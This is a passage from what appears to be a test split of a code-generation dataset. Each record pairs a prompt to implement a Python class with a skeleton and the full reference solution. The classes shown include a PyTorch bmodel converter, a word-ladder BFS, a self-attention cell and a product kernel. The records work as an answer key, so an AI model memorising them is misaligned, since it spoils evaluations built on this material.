- `string`: The encoded string - `alphabet`: The alphabet to use for decoding\"\"\"\n base = len(alphabet)\n strlen = len(string)\n num = 0\n idx = 0\n for char in string:\n power = strlen - (idx + 1)\n num += alphabet.index(char) * base ** power\n idx += 1\n return num\n", "source": "the_stack_v2_python_sparse", "source_path": "String/023_geeksforgeeks_Design_a_tiny_URL_or_URL_Shortener/Solution.py", "source_repo": "Keshav1506/competitive_programming", "split": "test", "star_events_count": 0} {"blob_id": "32c1571a62386f6d4fb490056be5dc4bfd9763d7", "bodies": ["super(PytorchGraphConverter, self).__init__(framework, base_path)\nprint('{} bmodel converter init'.format(model_name))\nself.model_name = model_name\nself.models_path = models_path\nself.shapes = shapes\nself.dyns = dyns\nself.outdirs = outdirs\nself.nets_name = nets_name\nself.target = target\nassert len(self.models_path) == len(self.nets_name)\nassert len(self.models_path) == len(self.dyns)\nassert len(self.models_path) == len(self.outdirs)\nself.output_base_path = os.path.join(self.base_path, self.model_name + '_ir')\nif not os.path.exists(self.output_base_path):\n os.mkdir(self.output_base_path)", "print('generate {} bmodel...'.format(self.model_name))\nfor i in range(len(self.models_path)):\n super(PytorchGraphConverter, self).compile_bmodel(model=self.models_path[i], shapes=self.shapes[i], dyn=self.dyns[i], net_name=self.nets_name[i], outdir=self.outdirs[i], target=self.target)\nos.system('rm -f ./bm_multi_engine_stas_0.dat')\nos.system('rm -f ./*.grp')\nprint('generate bmodel {}'.format(self.output_base_path))"], "bodies_text": "<|body_start_0|>\n super(PytorchGraphConverter, self).__init__(framework, base_path)\n print('{} bmodel converter init'.format(model_name))\n self.model_name = model_name\n self.models_path = models_path\n self.shapes = shapes\n self.dyns = dyns\n self.outdirs = outdirs\n self.nets_name = nets_name\n self.target = target\n assert len(self.models_path) == len(self.nets_name)\n assert len(self.models_path) == len(self.dyns)\n assert len(self.models_path) == len(self.outdirs)\n self.output_base_path = os.path.join(self.base_path, self.model_name + '_ir')\n if not os.path.exists(self.output_base_path):\n os.mkdir(self.output_base_path)\n<|end_body_0|>\n\n<|body_start_1|>\n print('generate {} bmodel...'.format(self.model_name))\n for i in range(len(self.models_path)):\n super(PytorchGraphConverter, self).compile_bmodel(model=self.models_path[i], shapes=self.shapes[i], dyn=self.dyns[i], net_name=self.nets_name[i], outdir=self.outdirs[i], target=self.target)\n os.system('rm -f ./bm_multi_engine_stas_0.dat')\n os.system('rm -f ./*.grp')\n print('generate bmodel {}'.format(self.output_base_path))\n<|end_body_1|>\n", "class_docstring": "pytorch graph bmodel converter", "class_name": "PytorchGraphConverter", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass PytorchGraphConverter:\n \"\"\"pytorch graph bmodel converter\"\"\"\n\n def __init__(self, model_name, base_path, models_path, shapes, dyns, outdirs, nets_name, framework, target):\n \"\"\"Init pytorch graph bmodel converter\"\"\"\n <|body_0|>\n\n def converter(self):\n \"\"\"convert pytorch graph\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(PytorchGraphConverter, self).__init__(framework, base_path)\n print('{} bmodel converter init'.format(model_name))\n self.model_name = model_name\n self.models_path = models_path\n self.shapes = shapes\n self.dyns = dyns\n self.outdirs = outdirs\n self.nets_name = nets_name\n self.target = target\n assert len(self.models_path) == len(self.nets_name)\n assert len(self.models_path) == len(self.dyns)\n assert len(self.models_path) == len(self.outdirs)\n self.output_base_path = os.path.join(self.base_path, self.model_name + '_ir')\n if not os.path.exists(self.output_base_path):\n os.mkdir(self.output_base_path)\n<|end_body_0|>\n\n<|body_start_1|>\n print('generate {} bmodel...'.format(self.model_name))\n for i in range(len(self.models_path)):\n super(PytorchGraphConverter, self).compile_bmodel(model=self.models_path[i], shapes=self.shapes[i], dyn=self.dyns[i], net_name=self.nets_name[i], outdir=self.outdirs[i], target=self.target)\n os.system('rm -f ./bm_multi_engine_stas_0.dat')\n os.system('rm -f ./*.grp')\n print('generate bmodel {}'.format(self.output_base_path))\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000424", "length_bytes": 15723, "license_type": "permissive", "methods": [{"docstring": "Init pytorch graph bmodel converter", "name": "__init__", "signature": "def __init__(self, model_name, base_path, models_path, shapes, dyns, outdirs, nets_name, framework, target)"}, {"docstring": "convert pytorch graph", "name": "converter", "signature": "def converter(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_001013", "prompt": "Implement the Python class `PytorchGraphConverter` described below.\n\nClass description:\npytorch graph bmodel converter\n\nMethod signatures and docstrings:\n- def __init__(self, model_name, base_path, models_path, shapes, dyns, outdirs, nets_name, framework, target): Init pytorch graph bmodel converter\n- def converter(self): convert pytorch graph", "prompted_full_text": "Implement the Python class `PytorchGraphConverter` described below.\n\nClass description:\npytorch graph bmodel converter\n\nMethod signatures and docstrings:\n- def __init__(self, model_name, base_path, models_path, shapes, dyns, outdirs, nets_name, framework, target): Init pytorch graph bmodel converter\n- def converter(self): convert pytorch graph\n\n<|skeleton|>\nclass PytorchGraphConverter:\n \"\"\"pytorch graph bmodel converter\"\"\"\n\n def __init__(self, model_name, base_path, models_path, shapes, dyns, outdirs, nets_name, framework, target):\n \"\"\"Init pytorch graph bmodel converter\"\"\"\n <|body_0|>\n\n def converter(self):\n \"\"\"convert pytorch graph\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(PytorchGraphConverter, self).__init__(framework, base_path)\n print('{} bmodel converter init'.format(model_name))\n self.model_name = model_name\n self.models_path = models_path\n self.shapes = shapes\n self.dyns = dyns\n self.outdirs = outdirs\n self.nets_name = nets_name\n self.target = target\n assert len(self.models_path) == len(self.nets_name)\n assert len(self.models_path) == len(self.dyns)\n assert len(self.models_path) == len(self.outdirs)\n self.output_base_path = os.path.join(self.base_path, self.model_name + '_ir')\n if not os.path.exists(self.output_base_path):\n os.mkdir(self.output_base_path)\n<|end_body_0|>\n\n<|body_start_1|>\n print('generate {} bmodel...'.format(self.model_name))\n for i in range(len(self.models_path)):\n super(PytorchGraphConverter, self).compile_bmodel(model=self.models_path[i], shapes=self.shapes[i], dyn=self.dyns[i], net_name=self.nets_name[i], outdir=self.outdirs[i], target=self.target)\n os.system('rm -f ./bm_multi_engine_stas_0.dat')\n os.system('rm -f ./*.grp')\n print('generate bmodel {}'.format(self.output_base_path))\n<|end_body_1|>\n", "revision_id": "c9fa07851da663dda4953dba72e1d3937299a4ea", "skeleton": "<|skeleton|>\nclass PytorchGraphConverter:\n \"\"\"pytorch graph bmodel converter\"\"\"\n\n def __init__(self, model_name, base_path, models_path, shapes, dyns, outdirs, nets_name, framework, target):\n \"\"\"Init pytorch graph bmodel converter\"\"\"\n <|body_0|>\n\n def converter(self):\n \"\"\"convert pytorch graph\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class PytorchGraphConverter:\n \"\"\"pytorch graph bmodel converter\"\"\"\n\n def __init__(self, model_name, base_path, models_path, shapes, dyns, outdirs, nets_name, framework, target):\n \"\"\"Init pytorch graph bmodel converter\"\"\"\n super(PytorchGraphConverter, self).__init__(framework, base_path)\n print('{} bmodel converter init'.format(model_name))\n self.model_name = model_name\n self.models_path = models_path\n self.shapes = shapes\n self.dyns = dyns\n self.outdirs = outdirs\n self.nets_name = nets_name\n self.target = target\n assert len(self.models_path) == len(self.nets_name)\n assert len(self.models_path) == len(self.dyns)\n assert len(self.models_path) == len(self.outdirs)\n self.output_base_path = os.path.join(self.base_path, self.model_name + '_ir')\n if not os.path.exists(self.output_base_path):\n os.mkdir(self.output_base_path)\n\n def converter(self):\n \"\"\"convert pytorch graph\"\"\"\n print('generate {} bmodel...'.format(self.model_name))\n for i in range(len(self.models_path)):\n super(PytorchGraphConverter, self).compile_bmodel(model=self.models_path[i], shapes=self.shapes[i], dyn=self.dyns[i], net_name=self.nets_name[i], outdir=self.outdirs[i], target=self.target)\n os.system('rm -f ./bm_multi_engine_stas_0.dat')\n os.system('rm -f ./*.grp')\n print('generate bmodel {}'.format(self.output_base_path))\n", "source": "the_stack_v2_python_sparse", "source_path": "modules/utils/bmodel_converter.py", "source_repo": "sophon-ai-algo/sophon-inference", "split": "test", "star_events_count": 32} {"blob_id": "183fb174054ec2e9c074afbb65c00a7ef0287c04", "bodies": ["if not beginWord or not endWord or (not wordList):\n return 0\nstate_d = self._construct_dict(wordList)\nreturn self.bfs(beginWord, endWord, state_d)", "res = {}\nfor w in wordList:\n for i in range(len(w)):\n tmp_word = w[:i] + '_' + w[i + 1:]\n res[tmp_word] = res.get(tmp_word, []) + [w]\nreturn res", "queue, visited = (deque([(beginWord, 1)]), set())\nwhile queue:\n word, steps = queue.popleft()\n if word == endWord:\n return steps\n if word not in visited:\n visited.add(word)\n for i in range(len(word)):\n tmp_word = word[:i] + '_' + word[i + 1:]\n neighbor_words = state_d.get(tmp_word, [])\n for nw in neighbor_words:\n if nw not in visited:\n queue.append((nw, steps + 1))\nreturn 0"], "bodies_text": "<|body_start_0|>\n if not beginWord or not endWord or (not wordList):\n return 0\n state_d = self._construct_dict(wordList)\n return self.bfs(beginWord, endWord, state_d)\n<|end_body_0|>\n\n<|body_start_1|>\n res = {}\n for w in wordList:\n for i in range(len(w)):\n tmp_word = w[:i] + '_' + w[i + 1:]\n res[tmp_word] = res.get(tmp_word, []) + [w]\n return res\n<|end_body_1|>\n\n<|body_start_2|>\n queue, visited = (deque([(beginWord, 1)]), set())\n while queue:\n word, steps = queue.popleft()\n if word == endWord:\n return steps\n if word not in visited:\n visited.add(word)\n for i in range(len(word)):\n tmp_word = word[:i] + '_' + word[i + 1:]\n neighbor_words = state_d.get(tmp_word, [])\n for nw in neighbor_words:\n if nw not in visited:\n queue.append((nw, steps + 1))\n return 0\n<|end_body_2|>\n", "class_docstring": "This solution uses a hashmap to store all the state spaces Use more space for less time", "class_name": "Solution2", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution2:\n \"\"\"This solution uses a hashmap to store all the state spaces Use more space for less time\"\"\"\n\n def ladderLength(self, beginWord, endWord, wordList):\n \"\"\"main method body :param beginWord: word to start :param endWord: target end word :param wordList: word lists :return: steps\"\"\"\n <|body_0|>\n\n def _construct_dict(self, wordList):\n \"\"\"convert wordList into a neighbor dictionary of list :param wordList: :return:\"\"\"\n <|body_1|>\n\n def bfs(self, beginWord, endWord, state_d):\n \"\"\"bfs :param beginWord: :param endWord: :param state_d: :return:\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not beginWord or not endWord or (not wordList):\n return 0\n state_d = self._construct_dict(wordList)\n return self.bfs(beginWord, endWord, state_d)\n<|end_body_0|>\n\n<|body_start_1|>\n res = {}\n for w in wordList:\n for i in range(len(w)):\n tmp_word = w[:i] + '_' + w[i + 1:]\n res[tmp_word] = res.get(tmp_word, []) + [w]\n return res\n<|end_body_1|>\n\n<|body_start_2|>\n queue, visited = (deque([(beginWord, 1)]), set())\n while queue:\n word, steps = queue.popleft()\n if word == endWord:\n return steps\n if word not in visited:\n visited.add(word)\n for i in range(len(word)):\n tmp_word = word[:i] + '_' + word[i + 1:]\n neighbor_words = state_d.get(tmp_word, [])\n for nw in neighbor_words:\n if nw not in visited:\n queue.append((nw, steps + 1))\n return 0\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000425", "length_bytes": 2492, "license_type": "no_license", "methods": [{"docstring": "main method body :param beginWord: word to start :param endWord: target end word :param wordList: word lists :return: steps", "name": "ladderLength", "signature": "def ladderLength(self, beginWord, endWord, wordList)"}, {"docstring": "convert wordList into a neighbor dictionary of list :param wordList: :return:", "name": "_construct_dict", "signature": "def _construct_dict(self, wordList)"}, {"docstring": "bfs :param beginWord: :param endWord: :param state_d: :return:", "name": "bfs", "signature": "def bfs(self, beginWord, endWord, state_d)"}], "n_methods": 3, "prompt": "Implement the Python class `Solution2` described below.\n\nClass description:\nThis solution uses a hashmap to store all the state spaces Use more space for less time\n\nMethod signatures and docstrings:\n- def ladderLength(self, beginWord, endWord, wordList): main method body :param beginWord: word to start :param endWord: target end word :param wordList: word lists :return: steps\n- def _construct_dict(self, wordList): convert wordList into a neighbor dictionary of list :param wordList: :return:\n- def bfs(self, beginWord, endWord, state_d): bfs :param beginWord: :param endWord: :param state_d: :return:", "prompted_full_text": "Implement the Python class `Solution2` described below.\n\nClass description:\nThis solution uses a hashmap to store all the state spaces Use more space for less time\n\nMethod signatures and docstrings:\n- def ladderLength(self, beginWord, endWord, wordList): main method body :param beginWord: word to start :param endWord: target end word :param wordList: word lists :return: steps\n- def _construct_dict(self, wordList): convert wordList into a neighbor dictionary of list :param wordList: :return:\n- def bfs(self, beginWord, endWord, state_d): bfs :param beginWord: :param endWord: :param state_d: :return:\n\n<|skeleton|>\nclass Solution2:\n \"\"\"This solution uses a hashmap to store all the state spaces Use more space for less time\"\"\"\n\n def ladderLength(self, beginWord, endWord, wordList):\n \"\"\"main method body :param beginWord: word to start :param endWord: target end word :param wordList: word lists :return: steps\"\"\"\n <|body_0|>\n\n def _construct_dict(self, wordList):\n \"\"\"convert wordList into a neighbor dictionary of list :param wordList: :return:\"\"\"\n <|body_1|>\n\n def bfs(self, beginWord, endWord, state_d):\n \"\"\"bfs :param beginWord: :param endWord: :param state_d: :return:\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not beginWord or not endWord or (not wordList):\n return 0\n state_d = self._construct_dict(wordList)\n return self.bfs(beginWord, endWord, state_d)\n<|end_body_0|>\n\n<|body_start_1|>\n res = {}\n for w in wordList:\n for i in range(len(w)):\n tmp_word = w[:i] + '_' + w[i + 1:]\n res[tmp_word] = res.get(tmp_word, []) + [w]\n return res\n<|end_body_1|>\n\n<|body_start_2|>\n queue, visited = (deque([(beginWord, 1)]), set())\n while queue:\n word, steps = queue.popleft()\n if word == endWord:\n return steps\n if word not in visited:\n visited.add(word)\n for i in range(len(word)):\n tmp_word = word[:i] + '_' + word[i + 1:]\n neighbor_words = state_d.get(tmp_word, [])\n for nw in neighbor_words:\n if nw not in visited:\n queue.append((nw, steps + 1))\n return 0\n<|end_body_2|>\n", "revision_id": "2c534185854c1a6f5ffdb2698f9db9989f30a25b", "skeleton": "<|skeleton|>\nclass Solution2:\n \"\"\"This solution uses a hashmap to store all the state spaces Use more space for less time\"\"\"\n\n def ladderLength(self, beginWord, endWord, wordList):\n \"\"\"main method body :param beginWord: word to start :param endWord: target end word :param wordList: word lists :return: steps\"\"\"\n <|body_0|>\n\n def _construct_dict(self, wordList):\n \"\"\"convert wordList into a neighbor dictionary of list :param wordList: :return:\"\"\"\n <|body_1|>\n\n def bfs(self, beginWord, endWord, state_d):\n \"\"\"bfs :param beginWord: :param endWord: :param state_d: :return:\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution2:\n \"\"\"This solution uses a hashmap to store all the state spaces Use more space for less time\"\"\"\n\n def ladderLength(self, beginWord, endWord, wordList):\n \"\"\"main method body :param beginWord: word to start :param endWord: target end word :param wordList: word lists :return: steps\"\"\"\n if not beginWord or not endWord or (not wordList):\n return 0\n state_d = self._construct_dict(wordList)\n return self.bfs(beginWord, endWord, state_d)\n\n def _construct_dict(self, wordList):\n \"\"\"convert wordList into a neighbor dictionary of list :param wordList: :return:\"\"\"\n res = {}\n for w in wordList:\n for i in range(len(w)):\n tmp_word = w[:i] + '_' + w[i + 1:]\n res[tmp_word] = res.get(tmp_word, []) + [w]\n return res\n\n def bfs(self, beginWord, endWord, state_d):\n \"\"\"bfs :param beginWord: :param endWord: :param state_d: :return:\"\"\"\n queue, visited = (deque([(beginWord, 1)]), set())\n while queue:\n word, steps = queue.popleft()\n if word == endWord:\n return steps\n if word not in visited:\n visited.add(word)\n for i in range(len(word)):\n tmp_word = word[:i] + '_' + word[i + 1:]\n neighbor_words = state_d.get(tmp_word, [])\n for nw in neighbor_words:\n if nw not in visited:\n queue.append((nw, steps + 1))\n return 0\n", "source": "the_stack_v2_python_sparse", "source_path": "Week 03/id_118/LeetCode_127_118.py", "source_repo": "Carryours/algorithm004-03", "split": "test", "star_events_count": 2} {"blob_id": "230f5f17b1dc1a7d637581d25d54f89adaa38d6f", "bodies": ["super(SelfAtt, self).__init__()\nself.query, self.key, self.value = nn.CellList([nn.SequentialCell([nn.Dense(n_in, n_out), nn.Tanh()]) for _ in range(3)])\nself.bmm = ops.BatchMatMul()\nself.softmax = ops.Softmax()\nself.scale = Tensor(n_out, ms.float32)", "query = self.query(x)\nkey = self.key(x)\nvalue = self.value(x)\nalpha = self.bmm(query, key.swapaxes(-1, -2)) / np.sqrt(self.scale)\natt = self.softmax(alpha)\nout = self.bmm(att, value)\nreturn out"], "bodies_text": "<|body_start_0|>\n super(SelfAtt, self).__init__()\n self.query, self.key, self.value = nn.CellList([nn.SequentialCell([nn.Dense(n_in, n_out), nn.Tanh()]) for _ in range(3)])\n self.bmm = ops.BatchMatMul()\n self.softmax = ops.Softmax()\n self.scale = Tensor(n_out, ms.float32)\n<|end_body_0|>\n\n<|body_start_1|>\n query = self.query(x)\n key = self.key(x)\n value = self.value(x)\n alpha = self.bmm(query, key.swapaxes(-1, -2)) / np.sqrt(self.scale)\n att = self.softmax(alpha)\n out = self.bmm(att, value)\n return out\n<|end_body_1|>\n", "class_docstring": "Self-attention.", "class_name": "SelfAtt", "detected_licenses": ["Apache-2.0", "LicenseRef-scancode-unknown-license-reference", "LicenseRef-scancode-proprietary-license"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass SelfAtt:\n \"\"\"Self-attention.\"\"\"\n\n def __init__(self, n_in: int, n_out: int):\n \"\"\"Parameters ---------- n_in : int input dimension. n_out : int output dimension.\"\"\"\n <|body_0|>\n\n def construct(self, x: Tensor) -> Tensor:\n \"\"\"Parameters ---------- x : Tensor [..., size, dim]. Returns ------- out : Tensor [..., size, dim].\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(SelfAtt, self).__init__()\n self.query, self.key, self.value = nn.CellList([nn.SequentialCell([nn.Dense(n_in, n_out), nn.Tanh()]) for _ in range(3)])\n self.bmm = ops.BatchMatMul()\n self.softmax = ops.Softmax()\n self.scale = Tensor(n_out, ms.float32)\n<|end_body_0|>\n\n<|body_start_1|>\n query = self.query(x)\n key = self.key(x)\n value = self.value(x)\n alpha = self.bmm(query, key.swapaxes(-1, -2)) / np.sqrt(self.scale)\n att = self.softmax(alpha)\n out = self.bmm(att, value)\n return out\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000426", "length_bytes": 9199, "license_type": "permissive", "methods": [{"docstring": "Parameters ---------- n_in : int input dimension. n_out : int output dimension.", "name": "__init__", "signature": "def __init__(self, n_in: int, n_out: int)"}, {"docstring": "Parameters ---------- x : Tensor [..., size, dim]. Returns ------- out : Tensor [..., size, dim].", "name": "construct", "signature": "def construct(self, x: Tensor) -> Tensor"}], "n_methods": 2, "prompt": "Implement the Python class `SelfAtt` described below.\n\nClass description:\nSelf-attention.\n\nMethod signatures and docstrings:\n- def __init__(self, n_in: int, n_out: int): Parameters ---------- n_in : int input dimension. n_out : int output dimension.\n- def construct(self, x: Tensor) -> Tensor: Parameters ---------- x : Tensor [..., size, dim]. Returns ------- out : Tensor [..., size, dim].", "prompted_full_text": "Implement the Python class `SelfAtt` described below.\n\nClass description:\nSelf-attention.\n\nMethod signatures and docstrings:\n- def __init__(self, n_in: int, n_out: int): Parameters ---------- n_in : int input dimension. n_out : int output dimension.\n- def construct(self, x: Tensor) -> Tensor: Parameters ---------- x : Tensor [..., size, dim]. Returns ------- out : Tensor [..., size, dim].\n\n<|skeleton|>\nclass SelfAtt:\n \"\"\"Self-attention.\"\"\"\n\n def __init__(self, n_in: int, n_out: int):\n \"\"\"Parameters ---------- n_in : int input dimension. n_out : int output dimension.\"\"\"\n <|body_0|>\n\n def construct(self, x: Tensor) -> Tensor:\n \"\"\"Parameters ---------- x : Tensor [..., size, dim]. Returns ------- out : Tensor [..., size, dim].\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(SelfAtt, self).__init__()\n self.query, self.key, self.value = nn.CellList([nn.SequentialCell([nn.Dense(n_in, n_out), nn.Tanh()]) for _ in range(3)])\n self.bmm = ops.BatchMatMul()\n self.softmax = ops.Softmax()\n self.scale = Tensor(n_out, ms.float32)\n<|end_body_0|>\n\n<|body_start_1|>\n query = self.query(x)\n key = self.key(x)\n value = self.value(x)\n alpha = self.bmm(query, key.swapaxes(-1, -2)) / np.sqrt(self.scale)\n att = self.softmax(alpha)\n out = self.bmm(att, value)\n return out\n<|end_body_1|>\n", "revision_id": "eab643f51336dbf7d711f02d27e6516e5affee59", "skeleton": "<|skeleton|>\nclass SelfAtt:\n \"\"\"Self-attention.\"\"\"\n\n def __init__(self, n_in: int, n_out: int):\n \"\"\"Parameters ---------- n_in : int input dimension. n_out : int output dimension.\"\"\"\n <|body_0|>\n\n def construct(self, x: Tensor) -> Tensor:\n \"\"\"Parameters ---------- x : Tensor [..., size, dim]. Returns ------- out : Tensor [..., size, dim].\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class SelfAtt:\n \"\"\"Self-attention.\"\"\"\n\n def __init__(self, n_in: int, n_out: int):\n \"\"\"Parameters ---------- n_in : int input dimension. n_out : int output dimension.\"\"\"\n super(SelfAtt, self).__init__()\n self.query, self.key, self.value = nn.CellList([nn.SequentialCell([nn.Dense(n_in, n_out), nn.Tanh()]) for _ in range(3)])\n self.bmm = ops.BatchMatMul()\n self.softmax = ops.Softmax()\n self.scale = Tensor(n_out, ms.float32)\n\n def construct(self, x: Tensor) -> Tensor:\n \"\"\"Parameters ---------- x : Tensor [..., size, dim]. Returns ------- out : Tensor [..., size, dim].\"\"\"\n query = self.query(x)\n key = self.key(x)\n value = self.value(x)\n alpha = self.bmm(query, key.swapaxes(-1, -2)) / np.sqrt(self.scale)\n att = self.softmax(alpha)\n out = self.bmm(att, value)\n return out\n", "source": "the_stack_v2_python_sparse", "source_path": "research/gnn/nri-mpm/models/base.py", "source_repo": "mindspore-ai/models", "split": "test", "star_events_count": 301} {"blob_id": "4b4163e1eca0a5a521cd743c8ecbe6d1c932fdd9", "bodies": ["self.vartypes = vartypes\nself.kertypes = dict(c=config.conti_kertype, o=config.ordered_kertype, u=config.unordered_kertype)\nself.bw_methods = dict(c=config.conti_bw_method, o=config.ordered_bw_method, u=config.unordered_bw_method)\nself.conti_bw_temperature = config.conti_bw_temperature\nself._fit(data_ref)", "self.data_ref = data_ref\nself.bandwidths = []\nfor k, vtype in enumerate(self.vartypes):\n bw_method = self.bw_methods.get(vtype, lambda x: 'not implemented')\n if isinstance(bw_method, str):\n bw = self.BW_METHODS[bw_method](data_ref[:, k])\n else:\n bw = bw_method(data_ref[:, k])\n if vtype == 'c':\n bw = bw * self.conti_bw_temperature\n if bw == 0:\n bw = MINIMUM_CONTI_BANDWIDTH\n self.bandwidths.append(bw)", "gram_matrices = []\nfor k, vtype in enumerate(self.vartypes):\n func = kernel_func[self.kertypes[vtype]]\n gram_matrix = func(self.bandwidths[k], data[:, k][:, None], self.data_ref[:, k][None, :])\n gram_matrices.append(gram_matrix)\nreturn np.array(gram_matrices).prod(axis=0)"], "bodies_text": "<|body_start_0|>\n self.vartypes = vartypes\n self.kertypes = dict(c=config.conti_kertype, o=config.ordered_kertype, u=config.unordered_kertype)\n self.bw_methods = dict(c=config.conti_bw_method, o=config.ordered_bw_method, u=config.unordered_bw_method)\n self.conti_bw_temperature = config.conti_bw_temperature\n self._fit(data_ref)\n<|end_body_0|>\n\n<|body_start_1|>\n self.data_ref = data_ref\n self.bandwidths = []\n for k, vtype in enumerate(self.vartypes):\n bw_method = self.bw_methods.get(vtype, lambda x: 'not implemented')\n if isinstance(bw_method, str):\n bw = self.BW_METHODS[bw_method](data_ref[:, k])\n else:\n bw = bw_method(data_ref[:, k])\n if vtype == 'c':\n bw = bw * self.conti_bw_temperature\n if bw == 0:\n bw = MINIMUM_CONTI_BANDWIDTH\n self.bandwidths.append(bw)\n<|end_body_1|>\n\n<|body_start_2|>\n gram_matrices = []\n for k, vtype in enumerate(self.vartypes):\n func = kernel_func[self.kertypes[vtype]]\n gram_matrix = func(self.bandwidths[k], data[:, k][:, None], self.data_ref[:, k][None, :])\n gram_matrices.append(gram_matrix)\n return np.array(gram_matrices).prod(axis=0)\n<|end_body_2|>\n", "class_docstring": "Product kernel object. Notes: Bandwidth methods: ``statsmodels.nonparametric.bandwidths``: https://www.statsmodels.org/devel/_modules/statsmodels/nonparametric/bandwidths.html", "class_name": "VanillaProductKernel", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass VanillaProductKernel:\n \"\"\"Product kernel object. Notes: Bandwidth methods: ``statsmodels.nonparametric.bandwidths``: https://www.statsmodels.org/devel/_modules/statsmodels/nonparametric/bandwidths.html\"\"\"\n\n def __init__(self, data_ref: np.ndarray, vartypes: str, config: VanillaProductKernelConfig=VanillaProductKernelConfig()):\n \"\"\"Constructor. Parameters: data_ref : Reference data points for which the kernel values are computed. vartypes : The variable type ('c': continuous, 'o': ordered, 'u': unordered). Example: ``'ccou'``. product_kernel_config : the configuration object.\"\"\"\n <|body_0|>\n\n def _fit(self, data_ref: np.ndarray) -> None:\n \"\"\"Fit the product kernel. Parameters: data_ref : ndarray of shape ``(n_obs, n_dim)`` the kernel centers.\"\"\"\n <|body_1|>\n\n def __call__(self, data: np.ndarray) -> np.ndarray:\n \"\"\"Compute the kernel matrix ``(k(data_i, data_ref_j))_{ij}``. Parameters: data : ndarray of shape ``(n_data, n_dim)``. Returns: ndarray of shape ``(n_data, n_data_ref)``.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.vartypes = vartypes\n self.kertypes = dict(c=config.conti_kertype, o=config.ordered_kertype, u=config.unordered_kertype)\n self.bw_methods = dict(c=config.conti_bw_method, o=config.ordered_bw_method, u=config.unordered_bw_method)\n self.conti_bw_temperature = config.conti_bw_temperature\n self._fit(data_ref)\n<|end_body_0|>\n\n<|body_start_1|>\n self.data_ref = data_ref\n self.bandwidths = []\n for k, vtype in enumerate(self.vartypes):\n bw_method = self.bw_methods.get(vtype, lambda x: 'not implemented')\n if isinstance(bw_method, str):\n bw = self.BW_METHODS[bw_method](data_ref[:, k])\n else:\n bw = bw_method(data_ref[:, k])\n if vtype == 'c':\n bw = bw * self.conti_bw_temperature\n if bw == 0:\n bw = MINIMUM_CONTI_BANDWIDTH\n self.bandwidths.append(bw)\n<|end_body_1|>\n\n<|body_start_2|>\n gram_matrices = []\n for k, vtype in enumerate(self.vartypes):\n func = kernel_func[self.kertypes[vtype]]\n gram_matrix = func(self.bandwidths[k], data[:, k][:, None], self.data_ref[:, k][None, :])\n gram_matrices.append(gram_matrix)\n return np.array(gram_matrices).prod(axis=0)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000427", "length_bytes": 9714, "license_type": "permissive", "methods": [{"docstring": "Constructor. Parameters: data_ref : Reference data points for which the kernel values are computed. vartypes : The variable type ('c': continuous, 'o': ordered, 'u': unordered). Example: ``'ccou'``. product_kernel_config : the configuration object.", "name": "__init__", "signature": "def __init__(self, data_ref: np.ndarray, vartypes: str, config: VanillaProductKernelConfig=VanillaProductKernelConfig())"}, {"docstring": "Fit the product kernel. Parameters: data_ref : ndarray of shape ``(n_obs, n_dim)`` the kernel centers.", "name": "_fit", "signature": "def _fit(self, data_ref: np.ndarray) -> None"}, {"docstring": "Compute the kernel matrix ``(k(data_i, data_ref_j))_{ij}``. Parameters: data : ndarray of shape ``(n_data, n_dim)``. Returns: ndarray of shape ``(n_data, n_data_ref)``.", "name": "__call__", "signature": "def __call__(self, data: np.ndarray) -> np.ndarray"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_test_000008", "prompt": "Implement the Python class `VanillaProductKernel` described below.\n\nClass description:\nProduct kernel object. Notes: Bandwidth methods: ``statsmodels.nonparametric.bandwidths``: https://www.statsmodels.org/devel/_modules/statsmodels/nonparametric/bandwidths.html\n\nMethod signatures and docstrings:\n- def __init__(self, data_ref: np.ndarray, vartypes: str, config: VanillaProductKernelConfig=VanillaProductKernelConfig()): Constructor. Parameters: data_ref : Reference data points for which the kernel values are computed. vartypes : The variable type ('c': continuous, 'o': ordered, 'u': unordered). Example: ``'ccou'``. product_kernel_config : the configuration object.\n- def _fit(self, data_ref: np.ndarray) -> None: Fit the product kernel. Parameters: data_ref : ndarray of shape ``(n_obs, n_dim)`` the kernel centers.\n- def __call__(self, data: np.ndarray) -> np.ndarray: Compute the kernel matrix ``(k(data_i, data_ref_j))_{ij}``. Parameters: data : ndarray of shape ``(n_data, n_dim)``. Returns: ndarray of shape ``(n_data, n_data_ref)``.", "prompted_full_text": "Implement the Python class `VanillaProductKernel` described below.\n\nClass description:\nProduct kernel object. Notes: Bandwidth methods: ``statsmodels.nonparametric.bandwidths``: https://www.statsmodels.org/devel/_modules/statsmodels/nonparametric/bandwidths.html\n\nMethod signatures and docstrings:\n- def __init__(self, data_ref: np.ndarray, vartypes: str, config: VanillaProductKernelConfig=VanillaProductKernelConfig()): Constructor. Parameters: data_ref : Reference data points for which the kernel values are computed. 